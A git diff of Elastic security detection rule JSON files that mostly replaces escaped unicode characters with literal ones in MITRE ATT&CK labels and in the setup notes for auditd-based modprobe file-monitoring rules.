a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json index 20b55cf21f1..e25645782f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json index 2506531314a..1a3a6b35862 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json index e1520c8aaed..306d0b43154 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json index 718e3dcdb69..84e308c44d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json index 66cd2b18969..e5dd6f0ee53 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json index 66e33e75630..8632bbd4483 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json index 1f2e5d3f08a..506103dbb7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json index f5a908e127b..b52e7765e44 100644 --- a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json +++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json index 3394364c3b2..56747771e5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json index 485c4d300cc..7f005779339 100644 --- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json index 37c6b3db835..e78c60dec57 100644 --- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json index 0e9da1878b6..dfb11c8f317 100644 --- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json index 3f1890c9552..73989e296af 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", \"/etc/modprobe.d/*\") and not \n(process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\") or process.title : (\"*grep*\") or process.parent.pid == 1)\n", "required_fields": [ { @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json index 5ea959dc756..c514a4733c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json @@ -20,7 +20,7 @@ "process.executable", "file.path" ], - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*)\n", "required_fields": [ { @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json index 2ba8d17a13d..73e3f5a8fee 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json index 551c51843b9..87b144faa02 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", \"/etc/modprobe.d/*\") and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"dpkg\", \"cp\") or \n process.title : \"*grep*\" or process.parent.pid == 1\n)\n", "required_fields": [ { @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json index 92effad61ed..ea49fdefb68 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", 